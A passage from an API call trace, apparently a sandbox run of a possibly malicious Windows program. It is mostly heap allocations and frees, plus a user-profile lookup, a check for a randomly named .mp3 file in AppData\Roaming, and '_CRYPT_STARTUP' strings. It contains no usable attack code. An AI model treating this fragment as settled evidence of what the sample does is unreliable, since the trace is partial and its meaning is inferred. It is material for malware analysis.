0x2e54b28 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0229.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0229.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0229.557] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0229.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0229.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0229.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0229.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0229.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0229.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0229.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0229.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0229.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50470 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0229.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0229.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0229.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0229.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0229.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0229.563] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0229.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0229.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0229.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0229.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0229.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0229.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0229.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0229.569] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.570] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0229.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0229.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0229.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/eeVXHty18.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527619d0, ftCreationTime.dwHighDateTime=0x1d5ea81, ftLastAccessTime.dwLowDateTime=0x7f6ccad0, ftLastAccessTime.dwHighDateTime=0x1d5e1c9, ftLastWriteTime.dwLowDateTime=0x7f6ccad0, ftLastWriteTime.dwHighDateTime=0x1d5e1c9, nFileSizeHigh=0x0, nFileSizeLow=0x2479, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="eeVXHty18.mp3", cAlternateFileName="EEVXHT~1.MP3")) returned 0xa87050 [0229.572] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0229.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0229.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0229.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0229.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.573] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0229.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0229.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0229.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.574] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0229.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0229.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0229.578] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0229.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0229.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.578] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0229.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0229.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0229.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0229.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0229.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0229.628] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0229.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0229.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0229.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0229.629] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0229.629] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 